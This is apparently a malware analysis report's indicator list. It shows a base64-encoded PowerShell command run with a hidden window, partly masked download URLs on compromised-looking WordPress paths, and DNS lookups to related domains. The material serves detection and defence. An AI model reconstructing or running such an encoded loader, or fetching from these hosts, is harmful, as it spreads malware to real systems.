Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB5AGkAeQBzAGEAbwBxAHUAdABoAGEAcgBzAG8AZQBxAHUAagBpAG8AYwBoAD0AJwBkAGEAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIASQB0AHkAUABgAFIATwBgAF...
- 'pa#.##rtinface.com':443
- http://go##sz.com/wp-content/wbhJWVHG/
- http://my####ingserver.ml/wp-admin/41m/
- http://ri###.#artinface.com/wp-admin/nkf75/
- DNS ASK go##sz.com
- DNS ASK my####ingserver.ml
- DNS ASK ga####iuaxit.com
- DNS ASK ri###.#artinface.com
- DNS ASK pa#.##rtinface.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB5AGkAeQBzAGEAbwBxAHUAdABoAGEAcgBzAG8AZQBxAHUAagBpAG8AYwBoAD0AJwBkAGEAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIASQB0AHkAUABgAFIATwBgAF...' (with hidden window)